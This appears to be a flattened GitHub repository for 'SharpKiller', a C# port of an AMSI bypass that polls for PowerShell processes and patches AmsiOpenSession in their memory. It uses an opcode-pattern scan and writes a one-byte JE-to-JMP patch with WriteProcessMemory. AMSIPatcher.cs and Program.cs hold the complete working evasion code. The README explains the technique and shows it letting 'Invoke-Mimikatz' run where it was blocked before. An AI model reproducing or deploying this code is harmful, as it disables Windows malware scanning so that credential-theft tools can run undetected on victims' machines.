├── obj ├── x64 │ ├── Release │ │ ├── Sharp-Killer.csproj.FileListAbsolute.txt │ │ └── .NETFramework,Version=v4.8.AssemblyAttributes.cs │ └── Debug │ │ ├── Sharp-Killer.csproj.SuggestedBindingRedirects.cache │ │ ├── Sharp-Killer.csproj.CoreCompileInputs.cache │ │ ├── Sharp-Killer.exe │ │ ├── Sharp-Killer.pdb │ │ ├── DesignTimeResolveAssemblyReferences.cache │ │ ├── Sharp-Killer.csproj.AssemblyReference.cache │ │ ├── DesignTimeResolveAssemblyReferencesInput.cache │ │ ├── .NETFramework,Version=v4.8.AssemblyAttributes.cs │ │ └── Sharp-Killer.csproj.FileListAbsolute.txt ├── Debug │ ├── Sharp-Killer.csproj.SuggestedBindingRedirects.cache │ ├── Sharp-Killer.csproj.CoreCompileInputs.cache │ ├── Sharp-Killer.exe │ ├── Sharp-Killer.pdb │ ├── DesignTimeResolveAssemblyReferences.cache │ ├── Sharp-Killer.csproj.AssemblyReference.cache │ ├── DesignTimeResolveAssemblyReferencesInput.cache │ ├── .NETFramework,Version=v4.8.AssemblyAttributes.cs │ └── Sharp-Killer.csproj.FileListAbsolute.txt └── Release │ ├── Sharp-Killer.csproj.AssemblyReference.cache │ └── .NETFramework,Version=v4.8.AssemblyAttributes.cs ├── bin └── Debug │ ├── Sharp-Killer.exe │ ├── Sharp-Killer.pdb │ └── Sharp-Killer.exe.config ├── App.config ├── Sharp-Killer.csproj.user ├── Program.cs ├── Sharp-Killer.sln ├── Properties └── AssemblyInfo.cs ├── README.md ├── Sharp-Killer.csproj └── AMSIPatcher.cs /obj/x64/Release/Sharp-Killer.csproj.FileListAbsolute.txt: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /obj/Debug/Sharp-Killer.csproj.SuggestedBindingRedirects.cache: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /obj/x64/Debug/Sharp-Killer.csproj.SuggestedBindingRedirects.cache: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /obj/Debug/Sharp-Killer.csproj.CoreCompileInputs.cache: -------------------------------------------------------------------------------- 1 | af2683cf6546755c96c0e93826a25891e7c5c33b 2 | -------------------------------------------------------------------------------- /obj/x64/Debug/Sharp-Killer.csproj.CoreCompileInputs.cache: -------------------------------------------------------------------------------- 1 | 3c6d6a03a5196a30c8672509de8009f97e28abb3 2 | -------------------------------------------------------------------------------- /bin/Debug/Sharp-Killer.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ar0x4/SharpKiller/HEAD/bin/Debug/Sharp-Killer.exe -------------------------------------------------------------------------------- /bin/Debug/Sharp-Killer.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ar0x4/SharpKiller/HEAD/bin/Debug/Sharp-Killer.pdb -------------------------------------------------------------------------------- /obj/Debug/Sharp-Killer.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ar0x4/SharpKiller/HEAD/obj/Debug/Sharp-Killer.exe -------------------------------------------------------------------------------- /obj/Debug/Sharp-Killer.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ar0x4/SharpKiller/HEAD/obj/Debug/Sharp-Killer.pdb -------------------------------------------------------------------------------- /obj/x64/Debug/Sharp-Killer.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ar0x4/SharpKiller/HEAD/obj/x64/Debug/Sharp-Killer.exe -------------------------------------------------------------------------------- /obj/x64/Debug/Sharp-Killer.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ar0x4/SharpKiller/HEAD/obj/x64/Debug/Sharp-Killer.pdb -------------------------------------------------------------------------------- /obj/Debug/DesignTimeResolveAssemblyReferences.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ar0x4/SharpKiller/HEAD/obj/Debug/DesignTimeResolveAssemblyReferences.cache -------------------------------------------------------------------------------- /obj/Debug/Sharp-Killer.csproj.AssemblyReference.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ar0x4/SharpKiller/HEAD/obj/Debug/Sharp-Killer.csproj.AssemblyReference.cache -------------------------------------------------------------------------------- /obj/Release/Sharp-Killer.csproj.AssemblyReference.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ar0x4/SharpKiller/HEAD/obj/Release/Sharp-Killer.csproj.AssemblyReference.cache -------------------------------------------------------------------------------- /obj/x64/Debug/DesignTimeResolveAssemblyReferences.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ar0x4/SharpKiller/HEAD/obj/x64/Debug/DesignTimeResolveAssemblyReferences.cache -------------------------------------------------------------------------------- /obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ar0x4/SharpKiller/HEAD/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache -------------------------------------------------------------------------------- /obj/x64/Debug/Sharp-Killer.csproj.AssemblyReference.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ar0x4/SharpKiller/HEAD/obj/x64/Debug/Sharp-Killer.csproj.AssemblyReference.cache -------------------------------------------------------------------------------- /obj/x64/Debug/DesignTimeResolveAssemblyReferencesInput.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ar0x4/SharpKiller/HEAD/obj/x64/Debug/DesignTimeResolveAssemblyReferencesInput.cache -------------------------------------------------------------------------------- /App.config: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /bin/Debug/Sharp-Killer.exe.config: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /obj/Debug/.NETFramework,Version=v4.8.AssemblyAttributes.cs: -------------------------------------------------------------------------------- 1 | // 2 | using System; 3 | using System.Reflection; 4 | [assembly: global::System.Runtime.Versioning.TargetFrameworkAttribute(".NETFramework,Version=v4.8", FrameworkDisplayName = ".NET Framework 4.8")] 5 | -------------------------------------------------------------------------------- /obj/Release/.NETFramework,Version=v4.8.AssemblyAttributes.cs: -------------------------------------------------------------------------------- 1 | // 2 | using System; 3 | using System.Reflection; 4 | [assembly: global::System.Runtime.Versioning.TargetFrameworkAttribute(".NETFramework,Version=v4.8", FrameworkDisplayName = ".NET Framework 4.8")] 5 | -------------------------------------------------------------------------------- /obj/x64/Debug/.NETFramework,Version=v4.8.AssemblyAttributes.cs: -------------------------------------------------------------------------------- 1 | // 2 | using System; 3 | using System.Reflection; 4 | [assembly: global::System.Runtime.Versioning.TargetFrameworkAttribute(".NETFramework,Version=v4.8", FrameworkDisplayName = ".NET Framework 4.8")] 5 | -------------------------------------------------------------------------------- /obj/x64/Release/.NETFramework,Version=v4.8.AssemblyAttributes.cs: -------------------------------------------------------------------------------- 1 | // 2 | using System; 3 | using System.Reflection; 4 | [assembly: global::System.Runtime.Versioning.TargetFrameworkAttribute(".NETFramework,Version=v4.8", FrameworkDisplayName = ".NET Framework 4.8")] 5 | -------------------------------------------------------------------------------- /Sharp-Killer.csproj.user: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | publish\ 5 | 6 | 7 | 8 | 9 | 10 | de-DE 11 | false 12 | 13 | -------------------------------------------------------------------------------- /Program.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Diagnostics; 3 | using System.Threading; 4 | using System.Threading.Tasks; 5 | 6 | namespace Sharp_Killer 7 | { 8 | internal class Program 9 | { 10 | public static void Main(string[] args) 11 | { 12 | string processNameToMonitor = "powershell"; 13 | 14 | Console.WriteLine($"Monitoring for Powershell.exe"); 15 | 16 | AMSIPatcher amsiPatcher = new AMSIPatcher(); 17 | CancellationTokenSource cancellationTokenSource = new CancellationTokenSource(); 18 | 19 | // Terminate the program when the user types 'exit' 20 | Task.Run(() => 21 | { 22 | while (true) 23 | { 24 | string userInput = Console.ReadLine(); 25 | if (userInput != null && userInput.Trim().Equals("exit", StringComparison.OrdinalIgnoreCase)) 26 | { 27 | cancellationTokenSource.Cancel(); 28 | break; 29 | } 30 | } 31 | }); 32 | 33 | while (true) 34 | { 35 | Process[] processes = Process.GetProcessesByName(processNameToMonitor); 36 | if (processes.Length > 0) 37 | amsiPatcher.PatchAllPowershells(); 38 | if (cancellationTokenSource.Token.IsCancellationRequested) 39 | break; 40 | Thread.Sleep(500); 41 | } 42 | } 43 | } 44 | } -------------------------------------------------------------------------------- /Sharp-Killer.sln: -------------------------------------------------------------------------------- 1 | 2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 17 4 | VisualStudioVersion = 17.6.33815.320 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Sharp-Killer", "Sharp-Killer.csproj", "{4DD3206C-F14A-43A3-8EA8-88676810B8CD}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|Any CPU = Debug|Any CPU 11 | Debug|x64 = Debug|x64 12 | Release|Any CPU = Release|Any CPU 13 | Release|x64 = Release|x64 14 | EndGlobalSection 15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 16 | {4DD3206C-F14A-43A3-8EA8-88676810B8CD}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 17 | {4DD3206C-F14A-43A3-8EA8-88676810B8CD}.Debug|Any CPU.Build.0 = Debug|Any CPU 18 | {4DD3206C-F14A-43A3-8EA8-88676810B8CD}.Debug|x64.ActiveCfg = Debug|x64 19 | {4DD3206C-F14A-43A3-8EA8-88676810B8CD}.Debug|x64.Build.0 = Debug|x64 20 | {4DD3206C-F14A-43A3-8EA8-88676810B8CD}.Release|Any CPU.ActiveCfg = Release|Any CPU 21 | {4DD3206C-F14A-43A3-8EA8-88676810B8CD}.Release|Any CPU.Build.0 = Release|Any CPU 22 | {4DD3206C-F14A-43A3-8EA8-88676810B8CD}.Release|x64.ActiveCfg = Release|x64 23 | {4DD3206C-F14A-43A3-8EA8-88676810B8CD}.Release|x64.Build.0 = Release|x64 24 | EndGlobalSection 25 | GlobalSection(SolutionProperties) = preSolution 26 | HideSolutionNode = FALSE 27 | EndGlobalSection 28 | GlobalSection(ExtensibilityGlobals) = postSolution 29 | SolutionGuid = {ED52B0E4-08ED-45AE-8D05-4402B50C6624} 30 | EndGlobalSection 31 | EndGlobal 32 | -------------------------------------------------------------------------------- /Properties/AssemblyInfo.cs: -------------------------------------------------------------------------------- 1 | using System.Reflection; 2 | using System.Runtime.CompilerServices; 3 | using System.Runtime.InteropServices; 4 | 5 | // Allgemeine Informationen über eine Assembly werden über die folgenden 6 | // Attribute gesteuert. Ändern Sie diese Attributwerte, um die Informationen zu ändern, 7 | // die einer Assembly zugeordnet sind. 8 | [assembly: AssemblyTitle("Sharp-Killer")] 9 | [assembly: AssemblyDescription("")] 10 | [assembly: AssemblyConfiguration("")] 11 | [assembly: AssemblyCompany("")] 12 | [assembly: AssemblyProduct("Sharp-Killer")] 13 | [assembly: AssemblyCopyright("Copyright © 2023")] 14 | [assembly: AssemblyTrademark("")] 15 | [assembly: AssemblyCulture("")] 16 | 17 | // Durch Festlegen von ComVisible auf FALSE werden die Typen in dieser Assembly 18 | // für COM-Komponenten unsichtbar. Wenn Sie auf einen Typ in dieser Assembly von 19 | // COM aus zugreifen müssen, sollten Sie das ComVisible-Attribut für diesen Typ auf "True" festlegen. 20 | [assembly: ComVisible(false)] 21 | 22 | // Die folgende GUID bestimmt die ID der Typbibliothek, wenn dieses Projekt für COM verfügbar gemacht wird 23 | [assembly: Guid("4dd3206c-f14a-43a3-8ea8-88676810b8cd")] 24 | 25 | // Versionsinformationen für eine Assembly bestehen aus den folgenden vier Werten: 26 | // 27 | // Hauptversion 28 | // Nebenversion 29 | // Buildnummer 30 | // Revision 31 | // 32 | // Sie können alle Werte angeben oder Standardwerte für die Build- und Revisionsnummern verwenden, 33 | // indem Sie "*" wie unten gezeigt eingeben: 34 | // [assembly: AssemblyVersion("1.0.*")] 35 | [assembly: AssemblyVersion("1.0.0.0")] 36 | [assembly: AssemblyFileVersion("1.0.0.0")] 37 | -------------------------------------------------------------------------------- /obj/Debug/Sharp-Killer.csproj.FileListAbsolute.txt: -------------------------------------------------------------------------------- 1 | C:\Users\mbzra\source\repos\Schulung\CreateProcessDemo-Schulung- Mitigation Block Policies- 0x04\Sharp-Killer\bin\Debug\Sharp-Killer.exe.config 2 | C:\Users\mbzra\source\repos\Schulung\CreateProcessDemo-Schulung- Mitigation Block Policies- 0x04\Sharp-Killer\bin\Debug\Sharp-Killer.exe 3 | C:\Users\mbzra\source\repos\Schulung\CreateProcessDemo-Schulung- Mitigation Block Policies- 0x04\Sharp-Killer\bin\Debug\Sharp-Killer.pdb 4 | C:\Users\mbzra\source\repos\Schulung\CreateProcessDemo-Schulung- Mitigation Block Policies- 0x04\Sharp-Killer\obj\Debug\Sharp-Killer.csproj.AssemblyReference.cache 5 | C:\Users\mbzra\source\repos\Schulung\CreateProcessDemo-Schulung- Mitigation Block Policies- 0x04\Sharp-Killer\obj\Debug\Sharp-Killer.csproj.SuggestedBindingRedirects.cache 6 | C:\Users\mbzra\source\repos\Schulung\CreateProcessDemo-Schulung- Mitigation Block Policies- 0x04\Sharp-Killer\obj\Debug\Sharp-Killer.csproj.CoreCompileInputs.cache 7 | C:\Users\mbzra\source\repos\Schulung\CreateProcessDemo-Schulung- Mitigation Block Policies- 0x04\Sharp-Killer\obj\Debug\Sharp-Killer.exe 8 | C:\Users\mbzra\source\repos\Schulung\CreateProcessDemo-Schulung- Mitigation Block Policies- 0x04\Sharp-Killer\obj\Debug\Sharp-Killer.pdb 9 | C:\Users\HTB\Desktop\Projects\SharpKiller\bin\Debug\Sharp-Killer.exe.config 10 | C:\Users\HTB\Desktop\Projects\SharpKiller\bin\Debug\Sharp-Killer.exe 11 | C:\Users\HTB\Desktop\Projects\SharpKiller\bin\Debug\Sharp-Killer.pdb 12 | C:\Users\HTB\Desktop\Projects\SharpKiller\obj\Debug\Sharp-Killer.csproj.AssemblyReference.cache 13 | C:\Users\HTB\Desktop\Projects\SharpKiller\obj\Debug\Sharp-Killer.csproj.SuggestedBindingRedirects.cache 14 | C:\Users\HTB\Desktop\Projects\SharpKiller\obj\Debug\Sharp-Killer.csproj.CoreCompileInputs.cache 15 | C:\Users\HTB\Desktop\Projects\SharpKiller\obj\Debug\Sharp-Killer.exe 16 | C:\Users\HTB\Desktop\Projects\SharpKiller\obj\Debug\Sharp-Killer.pdb 17 | -------------------------------------------------------------------------------- /obj/x64/Debug/Sharp-Killer.csproj.FileListAbsolute.txt: -------------------------------------------------------------------------------- 1 | C:\Users\mbzra\source\repos\Schulung\CreateProcessDemo-Schulung- Mitigation Block Policies- 0x04\Sharp-Killer\bin\x64\Debug\Sharp-Killer.exe.config 2 | C:\Users\mbzra\source\repos\Schulung\CreateProcessDemo-Schulung- Mitigation Block Policies- 0x04\Sharp-Killer\bin\x64\Debug\Sharp-Killer.exe 3 | C:\Users\mbzra\source\repos\Schulung\CreateProcessDemo-Schulung- Mitigation Block Policies- 0x04\Sharp-Killer\bin\x64\Debug\Sharp-Killer.pdb 4 | C:\Users\mbzra\source\repos\Schulung\CreateProcessDemo-Schulung- Mitigation Block Policies- 0x04\Sharp-Killer\obj\x64\Debug\Sharp-Killer.csproj.AssemblyReference.cache 5 | C:\Users\mbzra\source\repos\Schulung\CreateProcessDemo-Schulung- Mitigation Block Policies- 0x04\Sharp-Killer\obj\x64\Debug\Sharp-Killer.csproj.SuggestedBindingRedirects.cache 6 | C:\Users\mbzra\source\repos\Schulung\CreateProcessDemo-Schulung- Mitigation Block Policies- 0x04\Sharp-Killer\obj\x64\Debug\Sharp-Killer.csproj.CoreCompileInputs.cache 7 | C:\Users\mbzra\source\repos\Schulung\CreateProcessDemo-Schulung- Mitigation Block Policies- 0x04\Sharp-Killer\obj\x64\Debug\Sharp-Killer.exe 8 | C:\Users\mbzra\source\repos\Schulung\CreateProcessDemo-Schulung- Mitigation Block Policies- 0x04\Sharp-Killer\obj\x64\Debug\Sharp-Killer.pdb 9 | C:\Users\mbzra\source\repos\SharpKiller\Sharp-Killer\bin\x64\Debug\Sharp-Killer.exe.config 10 | C:\Users\mbzra\source\repos\SharpKiller\Sharp-Killer\bin\x64\Debug\Sharp-Killer.exe 11 | C:\Users\mbzra\source\repos\SharpKiller\Sharp-Killer\bin\x64\Debug\Sharp-Killer.pdb 12 | C:\Users\mbzra\source\repos\SharpKiller\Sharp-Killer\obj\x64\Debug\Sharp-Killer.csproj.AssemblyReference.cache 13 | C:\Users\mbzra\source\repos\SharpKiller\Sharp-Killer\obj\x64\Debug\Sharp-Killer.csproj.SuggestedBindingRedirects.cache 14 | C:\Users\mbzra\source\repos\SharpKiller\Sharp-Killer\obj\x64\Debug\Sharp-Killer.csproj.CoreCompileInputs.cache 15 | C:\Users\mbzra\source\repos\SharpKiller\Sharp-Killer\obj\x64\Debug\Sharp-Killer.exe 16 | C:\Users\mbzra\source\repos\SharpKiller\Sharp-Killer\obj\x64\Debug\Sharp-Killer.pdb 17 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | *This is only the fork of the SharkKiller project, the main repo is on https://github.com/S1lkys/SharpKiller.* 2 | 3 | # SharpKiller 4 | Lifetime AMSI bypass AMSI-Killer by @ZeroMemoryEx ported to .NET Framework 4.8. 5 | 6 | 7 | Newly integrated features: 8 | 9 | [ x ] - Live scan for new powershell processes every 0.5 seconds -> Automatically patches new powershell instances 10 | 11 | ## Opcode Scan 12 | 13 | * we get the exact address of the jump instruction by searching for the first byte of each instruction this technique is effective even in the face of updates or modifications to the target data set. 14 | 15 | * for example : 16 | 17 | ` | 48:85D2 | test rdx, rdx |` 18 | 19 | ` | 74 3F | je amsi.7FFAE957C694 |` 20 | 21 | ` | 48 : 85C9 | test rcx, rcx |` 22 | 23 | ` | 74 3A | je amsi.7FFAE957C694 |` 24 | 25 | ` | 48 : 8379 08 00 | cmp qword ptr ds : [rcx + 8] , 0 |` 26 | 27 | ` | 74 33 | je amsi.7FFAE957C694 |` 28 | 29 | * the search pattern will be like this : 30 | 31 | `{ 0x48,'?','?', 0x74,'?',0x48,'?' ,'?' ,0x74,'?' ,0x48,'?' ,'?' ,'?' ,'?',0x74,0x33}` 32 | 33 | 34 | ![image](https://user-images.githubusercontent.com/60795188/221431685-60fb2012-db0f-41aa-bd7b-3a19f07c91c4.png) 35 | 36 | 37 | # Patch 38 | 39 | ## Before Patch 40 | 41 | * The program tests the value of RDX against itself. If the comparison evaluates to 0, the program executes a jump to return. Otherwise, the program proceeds to evaluate the next instruction 42 | 43 | ![image](https://user-images.githubusercontent.com/60795188/221431975-73c78c9c-5358-44c2-b0de-41d68024e2bb.png) 44 | 45 | * we cant execute "Invoke-Mimikatz" 46 | 47 | ![image](https://user-images.githubusercontent.com/60795188/221432132-20993ccf-c53e-493d-8b22-feaea86fb6bf.png) 48 | 49 | ## After Patch 50 | 51 | 52 | * we patch the first byte and change it from JE to JMP so it return directly 53 | 54 | ![Screenshot 2023-02-26 195848](https://user-images.githubusercontent.com/60795188/221444031-5b8c365f-cb38-4ce4-89b5-153ecc12208d.png) 55 | 56 | ![image](https://user-images.githubusercontent.com/60795188/221432418-841db688-879c-4915-8d6e-926236a3732c.png) 57 | 58 | * now we can execute "Invoke-Mimikatz" 59 | 60 | ![Screenshot 2023-02-26 195914](https://user-images.githubusercontent.com/60795188/221432425-5c121433-33f4-4b8d-add6-63c078d5edb8.png) 61 | 62 | 63 | 64 | 65 | 66 | References: 67 | https://github.com/ZeroMemoryEx/Amsi-Killer 68 | -------------------------------------------------------------------------------- /Sharp-Killer.csproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | AnyCPU 7 | {4DD3206C-F14A-43A3-8EA8-88676810B8CD} 8 | Exe 9 | Sharp_Killer 10 | Sharp-Killer 11 | v4.8 12 | 512 13 | true 14 | true 15 | publish\ 16 | true 17 | Disk 18 | false 19 | Foreground 20 | 7 21 | Days 22 | false 23 | false 24 | true 25 | 0 26 | 1.0.0.%2a 27 | false 28 | false 29 | true 30 | 31 | 32 | AnyCPU 33 | true 34 | full 35 | false 36 | bin\Debug\ 37 | DEBUG;TRACE 38 | prompt 39 | 4 40 | 41 | 42 | AnyCPU 43 | pdbonly 44 | true 45 | bin\Release\ 46 | TRACE 47 | prompt 48 | 4 49 | 50 | 51 | true 52 | bin\x64\Debug\ 53 | DEBUG;TRACE 54 | full 55 | x64 56 | 7.3 57 | prompt 58 | true 59 | 60 | 61 | bin\x64\Release\ 62 | TRACE 63 | true 64 | pdbonly 65 | x64 66 | 7.3 67 | prompt 68 | true 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | 77 | 78 | 79 | 80 | 81 | 82 | 83 | 84 | 85 | 86 | 87 | 88 | 89 | 90 | 91 | False 92 | Microsoft .NET Framework 4.8 %28x86 und x64%29 93 | true 94 | 95 | 96 | False 97 | .NET Framework 3.5 SP1 98 | false 99 | 100 | 101 | 102 | -------------------------------------------------------------------------------- /AMSIPatcher.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Runtime.InteropServices; 4 | 5 | namespace Sharp_Killer 6 | { 7 | public class AMSIPatcher 8 | { 9 | [DllImport("kernel32.dll")] 10 | static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, int nSize, ref int lpNumberOfBytesWritten); 11 | 12 | [DllImport("kernel32.dll", SetLastError = true)] 13 | static extern bool ReadProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, [Out] byte[] lpBuffer, int dwSize, out IntPtr lpNumberOfBytesRead); 14 | 15 | [DllImport("kernel32.dll")] 16 | static extern IntPtr OpenProcess(UInt32 dwDesiredAccess, bool bInheritHandle, UInt32 dwProcessId); 17 | 18 | [DllImport("kernel32", CharSet = CharSet.Ansi, ExactSpelling = true, SetLastError = true)] 19 | static extern IntPtr GetProcAddress(IntPtr hModule, string procName); 20 | 21 | [DllImport("kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)] 22 | internal static extern IntPtr LoadLibrary(string lpFileName); 23 | 24 | [DllImport("kernel32.dll", SetLastError = true)] 25 | static extern IntPtr CreateToolhelp32Snapshot(SnapshotFlags dwFlags, uint th32ProcessID); 26 | 27 | [DllImport("kernel32.dll")] 28 | static extern bool Process32First(IntPtr hSnapshot, ref PROCESSENTRY32 lppe); 29 | 30 | [DllImport("kernel32.dll")] 31 | static extern bool Process32Next(IntPtr hSnapshot, ref PROCESSENTRY32 lppe); 32 | 33 | [DllImport("kernel32.dll", SetLastError = true)] 34 | static extern bool CloseHandle(IntPtr hObject); 35 | 36 | static List alreadyPatched = new List(); 37 | 38 | [StructLayout(LayoutKind.Sequential)] 39 | struct PROCESSENTRY32 40 | { 41 | public uint dwSize; 42 | public uint cntUsage; 43 | public uint th32ProcessID; 44 | public IntPtr th32DefaultHeapID; 45 | public uint th32ModuleID; 46 | public uint cntThreads; 47 | public uint th32ParentProcessID; 48 | public int pcPriClassBase; 49 | public uint dwFlags; 50 | [MarshalAs(UnmanagedType.ByValTStr, SizeConst = 260)] 51 | public string szExeFile; 52 | }; 53 | 54 | [Flags] 55 | enum SnapshotFlags : uint 56 | { 57 | HeapList = 0x00000001, 58 | Process = 0x00000002, 59 | Thread = 0x00000004, 60 | Module = 0x00000008, 61 | Module32 = 0x00000010, 62 | Inherit = 0x80000000, 63 | All = 0x0000001F 64 | } 65 | 66 | private enum State 67 | { 68 | MEM_COMMIT = 0x00001000, 69 | MEM_RESERVE = 0x00002000 70 | } 71 | 72 | private static readonly UInt32 MEM_COMMIT = 0x1000; 73 | private static readonly UInt32 MEM_RESERVE = 0x2000; 74 | private static readonly UInt32 PAGE_EXECUTE_READ = 0x20; 75 | private static readonly UInt32 PAGE_READWRITE = 0x04; 76 | private static readonly UInt32 PAGE_EXECUTE_READWRITE = 0x40; 77 | 78 | private enum Process_access 79 | { 80 | PROCESS_ALL_ACCESS = 0x000F0000 | 0x00100000 | 0xFFFF, 81 | PROCESS_CREATE_THREAD = 0x0002, 82 | PROCESS_QUERY_INFORMATION = 0x0400, 83 | PROCESS_VM_OPERATION = 0x0008, 84 | PROCESS_VM_READ = 0x0010, 85 | PROCESS_VM_WRITE = 0x0020 86 | } 87 | 88 | private const UInt32 INVALID_HANDLE_VALUE = 0xffffffff; 89 | 90 | //00007FFAE957C650 | 48:85D2 | test rdx, rdx | 91 | //00007FFAE957C653 | 74 3F | je amsi.7FFAE957C694 | 92 | //00007FFAE957C655 | 48 : 85C9 | test rcx, rcx | 93 | //00007FFAE957C658 | 74 3A | je amsi.7FFAE957C694 | 94 | //00007FFAE957C65A | 48 : 8379 08 00 | cmp qword ptr ds : [rcx + 8] , 0 | 95 | //00007FFAE957C65F | 74 33 | je amsi.7FFAE957C694 | 96 | 97 | private byte[] patch = new byte[1] { 0xEB }; 98 | 99 | /// 100 | /// Searches for a specific pattern within a given memory address space represented by a byte array. 101 | /// 102 | /// A byte array representing the memory address to search within. 103 | /// The size of the memory space to search within. 104 | /// The pattern to search for, which is a combination of bytes and placeholders represented by "?" in the list. 105 | /// The size of the pattern to match. 106 | /// The offset within the memory address space where the pattern is found, or the last index if the pattern is not found. 107 | private int SearchPattern(byte[] startAddress, Int64 searchSize, List pattern, Int64 patternSize) 108 | { 109 | int i = 0; 110 | 111 | while (i < 1024) 112 | { 113 | 114 | if (startAddress[i].ToString().Equals(pattern[0].ToString())) 115 | { 116 | int j = 1; 117 | while (j < patternSize && i + j < searchSize && (pattern[j].ToString().Equals("?") || startAddress[i + j].ToString().Equals(pattern[j].ToString()))) 118 | j++; 119 | if (j == patternSize) 120 | return i + 3; 121 | } 122 | i++; 123 | } 124 | return i; 125 | } 126 | 127 | /// 128 | /// Patches the AMSI in a target process. 129 | /// 130 | /// The process ID of the target process to patch. 131 | /// 132 | /// -1 if the patching process failed, or 133 | /// 0 if the patching process was successful. 134 | /// 135 | private int PatchAmsi(int tpid) 136 | { 137 | List pattern = new List() { 0x48, '?', '?', 0x74, '?', 0x48, '?', '?', 0x74 }; 138 | 139 | int patternSize = pattern.Count; 140 | if (tpid == 0) 141 | return -1; 142 | 143 | IntPtr ProcessHandle = OpenProcess((Int32)Process_access.PROCESS_VM_OPERATION | (Int32)Process_access.PROCESS_VM_READ | (Int32)Process_access.PROCESS_VM_WRITE, false, (UInt32)tpid); 144 | if (ProcessHandle == null) 145 | return -1; 146 | 147 | IntPtr hm = LoadLibrary("amsi.dll"); 148 | if (hm == null) 149 | return -1; 150 | 151 | IntPtr AmsiAddr = GetProcAddress(hm, "AmsiOpenSession"); 152 | if (AmsiAddr == null) 153 | return -1; 154 | 155 | byte[] buff = new byte[1024]; 156 | IntPtr ReadPm = IntPtr.Zero; 157 | if (!ReadProcessMemory(ProcessHandle, AmsiAddr, buff, 1024, out ReadPm)) 158 | return -1; 159 | 160 | int matchAddress = SearchPattern(buff, buff.Length, pattern, patternSize); 161 | AmsiAddr += matchAddress; 162 | int byteswritten = 0; 163 | 164 | if (!WriteProcessMemory(ProcessHandle, AmsiAddr, patch, 1, ref byteswritten)) 165 | return -1; 166 | return 0; 167 | } 168 | 169 | /// 170 | /// Iterates through running PowerShell processes, patches AMSI if found, and tracks the result. 171 | /// 172 | public void PatchAllPowershells() 173 | { 174 | 175 | int procId = 0; 176 | int result = 0; 177 | string processName = "powershell.exe"; 178 | 179 | IntPtr hSnap = CreateToolhelp32Snapshot(SnapshotFlags.Process, 0); 180 | 181 | if ((UInt32)hSnap != INVALID_HANDLE_VALUE) 182 | { 183 | PROCESSENTRY32 entry = new PROCESSENTRY32(); 184 | 185 | entry.dwSize = (uint)Marshal.SizeOf(entry); 186 | 187 | if (Process32First(hSnap, ref entry)) 188 | { 189 | if (entry.th32ProcessID == 0) 190 | { 191 | Process32Next(hSnap, ref entry); 192 | do 193 | { 194 | if (entry.szExeFile.Equals(processName)) 195 | { 196 | procId = (int)entry.th32ProcessID; 197 | 198 | if (result == PatchAmsi(procId) && !alreadyPatched.Contains(procId)) 199 | { 200 | Console.WriteLine("[+] AMSI Patched: " + entry.th32ProcessID); 201 | alreadyPatched.Add(procId); 202 | } 203 | else if (result == -1) 204 | { 205 | Console.WriteLine(entry.th32ProcessID); 206 | Console.WriteLine("Result: " + result); 207 | Console.WriteLine("[-] Patch Failed"); 208 | } 209 | } 210 | } while (Process32Next(hSnap, ref entry)); 211 | } 212 | } 213 | CloseHandle(hSnap); 214 | return; 215 | } 216 | } 217 | } 218 | } 219 | --------------------------------------------------------------------------------